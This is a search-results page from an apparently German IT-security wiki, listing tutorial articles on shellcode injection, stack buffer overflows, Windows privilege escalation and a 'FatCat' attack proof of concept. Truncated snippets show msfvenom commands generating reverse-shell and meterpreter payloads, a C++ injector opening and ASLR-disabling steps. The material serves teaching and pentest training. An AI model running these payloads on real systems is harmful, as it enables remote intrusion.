code

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Shellcode Injection Part 1
31 Treffer, Zuletzt geändert:
sführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) I... rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); co
Buffer overflow in the 64-bit stack - Part 3
40 Treffer, Zuletzt geändert:
ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer overflow in the 64-bit stack - part 1
36 Treffer, Zuletzt geändert:
ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Buffer overflow in the 64-bit stack - Part 2
23 Treffer, Zuletzt geändert:
80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
Privilege escalation: Windows admin thanks to Linux
12 Treffer, Zuletzt geändert:
ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
FatCat Attack PoC
14 Treffer, Zuletzt geändert:
rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete